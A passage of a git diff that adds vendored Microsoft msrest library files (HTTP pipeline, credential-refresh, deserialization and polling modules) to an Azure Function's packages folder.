_SansIOAsyncHTTPPolicyRunner(AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType]): + """Async implementation of the SansIO policy. + """ + + def __init__(self, policy: SansIOHTTPPolicy) -> None: + super(_SansIOAsyncHTTPPolicyRunner, self).__init__() + self._policy = policy + + async def send(self, request: Request, **kwargs: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + self._policy.on_request(request, **kwargs) + try: + response = await self.next.send(request, **kwargs) # type: ignore + except Exception: + if not self._policy.on_exception(request, **kwargs): + raise + else: + self._policy.on_response(request, response, **kwargs) + return response + + +class AsyncHTTPSender(AbstractAsyncContextManager, abc.ABC, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """An http sender ABC. + """ + + @abc.abstractmethod + async def send(self, request: Request[HTTPRequestType], **config: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + """Send the request using this HTTP sender. + """ + pass + + def build_context(self) -> Any: + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + def __enter__(self): + raise TypeError("Use async with instead") + + def __exit__(self, exc_type, exc_val, exc_tb): + # __exit__ should exist in pair with __enter__ but never executed + pass # pragma: no cover + + +class AsyncPipeline(AbstractAsyncContextManager, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """A pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. + """ + + def __init__(self, policies: List[Union[AsyncHTTPPolicy, SansIOHTTPPolicy]] = None, sender: Optional[AsyncHTTPSender[HTTPRequestType, AsyncHTTPResponseType]] = None) -> None: + self._impl_policies = [] # type: List[AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType]] + if sender: + self._sender = sender + else: + # Import default only if nothing is provided + from .aiohttp import AioHTTPSender + self._sender = AioHTTPSender() + + for policy in (policies or []): + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOAsyncHTTPPolicyRunner(policy)) + else: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies)-1): + self._impl_policies[index].next = self._impl_policies[index+1] + if self._impl_policies: + self._impl_policies[-1].next = self._sender + + def __enter__(self): + raise TypeError("Use 'async with' instead") + + def __exit__(self, exc_type, exc_val, exc_tb): + # __exit__ should exist in pair with __enter__ but never executed + pass # pragma: no cover + + async def __aenter__(self) -> 'AsyncPipeline': + await self._sender.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self._sender.__aexit__(*exc_details) + + async def run(self, request: Request, **kwargs: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + context = self._sender.build_context() + pipeline_request = Request(request, context) + first_node = self._impl_policies[0] if self._impl_policies else self._sender + return await first_node.send(pipeline_request, **kwargs) # type: ignore + +__all__ = [ + 'AsyncHTTPPolicy', + 'AsyncHTTPSender', + 'AsyncPipeline', +] \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_requests.py new file mode 100644 index 0000000..690cbd1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_requests.py @@ -0,0 +1,129 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +import functools +import logging +from typing import Any, Callable, Optional, AsyncIterator as AsyncIteratorType + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback +) +from ..universal_http.async_requests import AsyncBasicRequestsHTTPSender +from . import AsyncHTTPSender, AsyncHTTPPolicy, Response, Request +from .requests import RequestsContext + + +_LOGGER = logging.getLogger(__name__) + + +class AsyncPipelineRequestsHTTPSender(AsyncHTTPSender): + """Implements a basic Pipeline, that supports universal HTTP lib "requests" driver. + """ + + def __init__(self, universal_http_requests_driver: Optional[AsyncBasicRequestsHTTPSender]=None) -> None: + self.driver = universal_http_requests_driver or AsyncBasicRequestsHTTPSender() + + async def __aenter__(self) -> 'AsyncPipelineRequestsHTTPSender': + await self.driver.__aenter__() + return self + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self.driver.__aexit__(*exc_details) + + async def close(self): + await self.__aexit__() + + def build_context(self): + # type: () -> RequestsContext + return RequestsContext( + session=self.driver.session, + ) + + async def send(self, request: Request, **kwargs) -> Response: + """Send request object according to configuration. + + :param Request request: The request object to be sent. + """ + if request.context is None: # Should not happen, but make mypy happy and does not hurt + request.context = self.build_context() + + if request.context.session is not self.driver.session: + kwargs['session'] = request.context.session + + return Response( + request, + await self.driver.send(request.http_request, **kwargs) + ) + + +class AsyncRequestsCredentialsPolicy(AsyncHTTPPolicy): + """Implementation of request-oauthlib except and retry logic. + """ + def __init__(self, credentials): + super(AsyncRequestsCredentialsPolicy, self).__init__() + self._creds = credentials + + async def send(self, request, **kwargs): + session = request.context.session + try: + self._creds.signed_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.signed_session() + + try: + try: + return await self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + error = "Token expired or is invalid. Attempting to refresh." + _LOGGER.warning(error) + + try: + try: + self._creds.refresh_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.refresh_session() + + return await self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + msg = "Token expired or is invalid." + raise_with_traceback(TokenExpiredError, msg, err) + + except (requests.RequestException, + oauth2.rfc6749.errors.OAuth2Error) as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/requests.py new file mode 100644 index 0000000..1074f59 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/requests.py @@ -0,0 +1,194 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import contextlib +import logging +import threading +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +import warnings + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from urllib3 import Retry # Needs requests 2.16 at least to be safe + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback +) +from ..universal_http import ClientRequest +from ..universal_http.requests import BasicRequestsHTTPSender +from . import HTTPSender, HTTPPolicy, Response, Request + + +_LOGGER = logging.getLogger(__name__) + + +class RequestsCredentialsPolicy(HTTPPolicy): + """Implementation of request-oauthlib except and retry logic. + """ + def __init__(self, credentials): + super(RequestsCredentialsPolicy, self).__init__() + self._creds = credentials + + def send(self, request, **kwargs): + session = request.context.session + try: + self._creds.signed_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.signed_session() + + try: + try: + return self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + error = "Token expired or is invalid. Attempting to refresh." + _LOGGER.warning(error) + + try: + try: + self._creds.refresh_session(session) + except TypeError: # Credentials does not support session injection + _LOGGER.warning("Your credentials class does not support session injection. Performance will not be at the maximum.") + request.context.session = session = self._creds.refresh_session() + + return self.next.send(request, **kwargs) + except (oauth2.rfc6749.errors.InvalidGrantError, + oauth2.rfc6749.errors.TokenExpiredError) as err: + msg = "Token expired or is invalid." + raise_with_traceback(TokenExpiredError, msg, err) + + except (requests.RequestException, + oauth2.rfc6749.errors.OAuth2Error) as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + +class RequestsPatchSession(HTTPPolicy): + """Implements request level configuration + that are actually to be done at the session level. + + This is highly deprecated, and is totally legacy. + The pipeline structure allows way better design for this. + """ + _protocols = ['http://', 'https://'] + + def send(self, request, **kwargs): + """Patch the current session with Request level operation config. + + This is deprecated, we shouldn't patch the session with + arguments at the Request, and "config" should be used. + """ + session = request.context.session + + old_max_redirects = None + if 'max_redirects' in kwargs: + warnings.warn("max_redirects in operation kwargs is deprecated, use config.redirect_policy instead", + DeprecationWarning) + old_max_redirects = session.max_redirects + session.max_redirects = int(kwargs['max_redirects']) + + old_trust_env = None + if 'use_env_proxies' in kwargs: + warnings.warn("use_env_proxies in operation kwargs is deprecated, use config.proxies instead", + DeprecationWarning) + old_trust_env = session.trust_env + session.trust_env = bool(kwargs['use_env_proxies']) + + old_retries = {} + if 'retries' in kwargs: + warnings.warn("retries in operation kwargs is deprecated, use config.retry_policy instead", + DeprecationWarning) + max_retries = kwargs['retries'] + for protocol in self._protocols: + old_retries[protocol] = session.adapters[protocol].max_retries + session.adapters[protocol].max_retries = max_retries + + try: + return self.next.send(request, **kwargs) + finally: + if old_max_redirects: + session.max_redirects = old_max_redirects + + if old_trust_env: + session.trust_env = old_trust_env + + if old_retries: + for protocol in self._protocols: + session.adapters[protocol].max_retries = old_retries[protocol] + +class RequestsContext(object): + def __init__(self, session): + self.session = session + + +class PipelineRequestsHTTPSender(HTTPSender): + """Implements a basic Pipeline, that supports universal HTTP lib "requests" driver. + """ + + def __init__(self, universal_http_requests_driver=None): + # type: (Optional[BasicRequestsHTTPSender]) -> None + self.driver = universal_http_requests_driver or BasicRequestsHTTPSender() + + def __enter__(self): + # type: () -> PipelineRequestsHTTPSender + self.driver.__enter__() + return self + + def __exit__(self, *exc_details): # pylint: disable=arguments-differ + self.driver.__exit__(*exc_details) + + def close(self): + self.__exit__() + + def build_context(self): + # type: () -> RequestsContext + return RequestsContext( + session=self.driver.session, + ) + + def send(self, request, **kwargs): + # type: (Request[ClientRequest], Any) -> Response + """Send request object according to configuration. + + :param Request request: The request object to be sent. + """ + if request.context is None: # Should not happen, but make mypy happy and does not hurt + request.context = self.build_context() + + if request.context.session is not self.driver.session: + kwargs['session'] = request.context.session + + return Response( + request, + self.driver.send(request.http_request, **kwargs) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/universal.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/universal.py new file mode 100644 index 0000000..228956c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/universal.py @@ -0,0 +1,253 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module represents universal policy that works whatever the HTTPSender implementation +""" +import json +import logging +import os +import xml.etree.ElementTree as ET +import platform +import codecs +import re + +from typing import Mapping, Any, Optional, AnyStr, Union, IO, cast, TYPE_CHECKING # pylint: disable=unused-import + +from ..version import msrest_version as _msrest_version +from . import SansIOHTTPPolicy +from ..exceptions import DeserializationError, raise_with_traceback +from ..http_logger import log_request, log_response + +if TYPE_CHECKING: + from . import Request, Response # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + +_BOM = codecs.BOM_UTF8.decode(encoding='utf-8') + + +class HeadersPolicy(SansIOHTTPPolicy): + """A simple policy that sends the given headers + with the request. + + This overwrite any headers already defined in the request. + """ + def __init__(self, headers): + # type: (Mapping[str, str]) -> None + self.headers = headers + + def on_request(self, request, **kwargs): + # type: (Request, Any) -> None + http_request = request.http_request + http_request.headers.update(self.headers) + +class UserAgentPolicy(SansIOHTTPPolicy): + _USERAGENT = "User-Agent" + _ENV_ADDITIONAL_USER_AGENT = 'AZURE_HTTP_USER_AGENT' + + def __init__(self, user_agent=None, overwrite=False): + # type: (Optional[str], bool) -> None + self._overwrite = overwrite + if user_agent is None: + self._user_agent = "python/{} ({}) msrest/{}".format( + platform.python_version(), + platform.platform(), + _msrest_version + ) + else: + self._user_agent = user_agent + + # Whatever you gave me a header explicitly or not, + # if the env variable is set, add to it. + add_user_agent_header = os.environ.get(self._ENV_ADDITIONAL_USER_AGENT, None) + if add_user_agent_header is not None: + self.add_user_agent(add_user_agent_header) + + @property + def user_agent(self): + # type: () -> str + """The current user agent value.""" + return self._user_agent + + def add_user_agent(self, value): + # type: (str) -> None + """Add value to current user agent with a space. + + :param str value: value to add to user agent. + """ + self._user_agent = "{} {}".format(self._user_agent, value) + + def on_request(self, request, **kwargs): + # type: (Request, Any) -> None + http_request = request.http_request + if self._overwrite or self._USERAGENT not in http_request.headers: + http_request.headers[self._USERAGENT] = self._user_agent + +class HTTPLogger(SansIOHTTPPolicy): + """A policy that logs HTTP request and response to the DEBUG logger. + + This accepts both global configuration, and kwargs request level with "enable_http_logger" + """ + def __init__(self, enable_http_logger = False): + self.enable_http_logger = enable_http_logger + + def on_request(self, request, **kwargs): + # type: (Request, Any) -> None + http_request = request.http_request + if kwargs.get("enable_http_logger", self.enable_http_logger): + log_request(None, http_request) + + def on_response(self, request, response, **kwargs): + # type: (Request, Response, Any) -> None + http_request = request.http_request + if kwargs.get("enable_http_logger", self.enable_http_logger): + log_response(None, http_request, response.http_response, result=response) + + +class RawDeserializer(SansIOHTTPPolicy): + + # Accept "text" because we're open minded people... + JSON_REGEXP = re.compile(r'^(application|text)/([a-z+.]+\+)?json$') + + # Name used in context + CONTEXT_NAME = "deserialized_data" + + @classmethod + def deserialize_from_text(cls, data, content_type=None): + # type: (Optional[Union[AnyStr, IO]], Optional[str]) -> Any + """Decode data according to content-type. + + Accept a stream of data as well, but will be load at once in memory for now. + + If no content-type, will return the string version (not bytes, not stream) + + :param data: Input, could be bytes or stream (will be decoded with UTF8) or text + :type data: str or bytes or IO + :param str content_type: The content type. + """ + if hasattr(data, 'read'): + # Assume a stream + data = cast(IO, data).read() + + if isinstance(data, bytes): + data_as_str = data.decode(encoding='utf-8-sig') + else: + # Explain to mypy the correct type. + data_as_str = cast(str, data) + + # Remove Byte Order Mark if present in string + data_as_str = data_as_str.lstrip(_BOM) + + if content_type is None: + return data + + if cls.JSON_REGEXP.match(content_type): + try: + return json.loads(data_as_str) + except ValueError as err: + raise DeserializationError("JSON is invalid: {}".format(err), err) + elif "xml" in (content_type or []): + try: + + try: + if isinstance(data, unicode): # type: ignore + # If I'm Python 2.7 and unicode XML will scream if I try a "fromstring" on unicode string + data_as_str = data_as_str.encode(encoding="utf-8") # type: ignore + except NameError: + pass + + return ET.fromstring(data_as_str) + except ET.ParseError: + # It might be because the server has an issue, and returned JSON with + # content-type XML.... + # So let's try a JSON load, and if it's still broken + # let's flow the initial exception + def _json_attemp(data): + try: + return True, json.loads(data) + except ValueError: + return False, None # Don't care about this one + success, json_result = _json_attemp(data) + if success: + return json_result + # If i'm here, it's not JSON, it's not XML, let's scream + # and raise the last context in this block (the XML exception) + # The function hack is because Py2.7 messes up with exception + # context otherwise. + _LOGGER.critical("Wasn't XML not JSON, failing") + raise_with_traceback(DeserializationError, "XML is invalid") + raise DeserializationError("Cannot deserialize content-type: {}".format(content_type)) + + @classmethod + def deserialize_from_http_generics(cls, body_bytes, headers): + # type: (Optional[Union[AnyStr, IO]], Mapping) -> Any + """Deserialize from HTTP response. + + Use bytes and headers to NOT use any requests/aiohttp or whatever + specific implementation. + Headers will tested for "content-type" + """ + # Try to use content-type from headers if available + content_type = None + if 'content-type' in headers: + content_type = headers['content-type'].split(";")[0].strip().lower() + # Ouch, this server did not declare what it sent... + # Let's guess it's JSON... + # Also, since Autorest was considering that an empty body was a valid JSON, + # need that test as well.... + else: + content_type = "application/json" + + if body_bytes: + return cls.deserialize_from_text(body_bytes, content_type) + return None + + def on_response(self, request, response, **kwargs): + # type: (Request, Response, Any) -> None + """Extract data from the body of a REST response object. + + This will load the entire payload in memory. + + Will follow Content-Type to parse. + We assume everything is UTF8 (BOM acceptable). + + :param raw_data: Data to be processed. + :param content_type: How to parse if raw_data is a string/bytes. + :raises JSONDecodeError: If JSON is requested and parsing is impossible. + :raises UnicodeDecodeError: If bytes is not UTF8 + :raises xml.etree.ElementTree.ParseError: If bytes is not valid XML + """ + # If response was asked as stream, do NOT read anything and quit now + if kwargs.get("stream", True): + return + + http_response = response.http_response + + response.context[self.CONTEXT_NAME] = self.deserialize_from_http_generics( + http_response.text(), + http_response.headers + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__init__.py new file mode 100644 index 0000000..cd99c3d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__init__.py @@ -0,0 +1,34 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import sys + +from .poller import LROPoller, NoPolling, PollingMethod +__all__ = ['LROPoller', 'NoPolling', 'PollingMethod'] + +if sys.version_info >= (3, 5, 2): + # Not executed on old Python, no syntax error + from .async_poller import AsyncNoPolling, AsyncPollingMethod, async_poller + __all__ += ['AsyncNoPolling', 'AsyncPollingMethod', 'async_poller'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..17ee18c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/async_poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/async_poller.cpython-39.pyc new file mode 100644 index 0000000..fcc6abc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/async_poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/poller.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/poller.cpython-39.pyc new file mode 100644 index 0000000..3feed09 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/__pycache__/poller.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/async_poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/async_poller.py new file mode 100644 index 0000000..50247bd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/async_poller.py @@ -0,0 +1,88 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from .poller import NoPolling as _NoPolling + +from ..serialization import Model +from ..async_client import ServiceClientAsync +from ..pipeline import ClientRawResponse + +class AsyncPollingMethod(object): + """ABC class for polling method. + """ + def initialize(self, client, initial_response, deserialization_callback): + raise NotImplementedError("This method needs to be implemented") + + async def run(self): + raise NotImplementedError("This method needs to be implemented") + + def status(self): + raise NotImplementedError("This method needs to be implemented") + + def finished(self): + raise NotImplementedError("This method needs to be implemented") + + def resource(self): + raise NotImplementedError("This method needs to be implemented") + + +class AsyncNoPolling(_NoPolling): + """An empty async poller that returns the deserialized initial response. + """ + async def run(self): + """Empty run, no polling. + + Just override initial run to add "async" + """ + pass + + +async def async_poller(client, initial_response, deserialization_callback, polling_method): + """Async Poller for long running operations. + + :param client: A msrest service client. Can be a SDK client and it will be casted to a ServiceClient. + :type client: msrest.service_client.ServiceClient + :param initial_response: The initial call response + :type initial_response: msrest.universal_http.ClientResponse or msrest.pipeline.ClientRawResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: msrest.polling.PollingMethod + """ + + try: + client = client if isinstance(client, ServiceClientAsync) else client._client + except AttributeError: + raise ValueError("Poller client parameter must be a low-level msrest Service Client or a SDK client.") + response = initial_response.response if isinstance(initial_response, ClientRawResponse) else initial_response + + if isinstance(deserialization_callback, type) and issubclass(deserialization_callback, Model): + deserialization_callback = deserialization_callback.deserialize + + # Might raise a CloudError + polling_method.initialize(client, response, deserialization_callback) + + await polling_method.run() + return polling_method.resource() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/poller.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/poller.py new file mode 100644 index 0000000..610db4e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/polling/poller.py @@ -0,0 +1,237 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import threading +import time +import uuid +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse + +from typing import Any, Callable, Union, List, Optional, TYPE_CHECKING + +if TYPE_CHECKING: + import requests + +from ..serialization import Model +from ..service_client import ServiceClient +from ..pipeline import ClientRawResponse + +class PollingMethod(object): + """ABC class for polling method. + """ + def initialize(self, client, initial_response, deserialization_callback): + # type: (Any, Any, Any) -> None + raise NotImplementedError("This method needs to be implemented") + + def run(self): + # type: () -> None + raise NotImplementedError("This method needs to be implemented") + + def status(self): + # type: () -> str + raise NotImplementedError("This method needs to be implemented") + + def finished(self): + # type: () -> bool + raise NotImplementedError("This method needs to be implemented") + + def resource(self): + # type: () -> Any + raise NotImplementedError("This method needs to be implemented") + +class NoPolling(PollingMethod): + """An empty poller that returns the deserialized initial response. + """ + def __init__(self): + self._initial_response = None + self._deserialization_callback = None + + def initialize(self, _, initial_response, deserialization_callback): + # type: (Any, requests.Response, Callable) -> None + self._initial_response = initial_response + self._deserialization_callback = deserialization_callback + + def run(self): + # type: () -> None + """Empty run, no polling. + """ + pass + + def status(self): + # type: () -> str + """Return the current status as a string. + :rtype: str + """ + return "succeeded" + + def finished(self): + # type: () -> bool + """Is this polling finished? + :rtype: bool + """ + return True + + def resource(self): + # type: () -> Any + return self._deserialization_callback(self._initial_response) + + +class LROPoller(object): + """Poller for long running operations. + + :param client: A msrest service client. Can be a SDK client and it will be casted to a ServiceClient. + :type client: msrest.service_client.ServiceClient + :param initial_response: The initial call response + :type initial_response: requests.Response or msrest.pipeline.ClientRawResponse + :param deserialization_callback: A callback that takes a Response and return a deserialized object. If a subclass of Model is given, this passes "deserialize" as callback. + :type deserialization_callback: callable or msrest.serialization.Model + :param polling_method: The polling strategy to adopt + :type polling_method: msrest.polling.PollingMethod + """ + + def __init__(self, client, initial_response, deserialization_callback, polling_method): + # type: (Any, Union[ClientRawResponse, requests.Response], Union[Model, Callable[[requests.Response], Model]], PollingMethod) -> None + try: + self._client = client if isinstance(client, ServiceClient) else client._client # type: 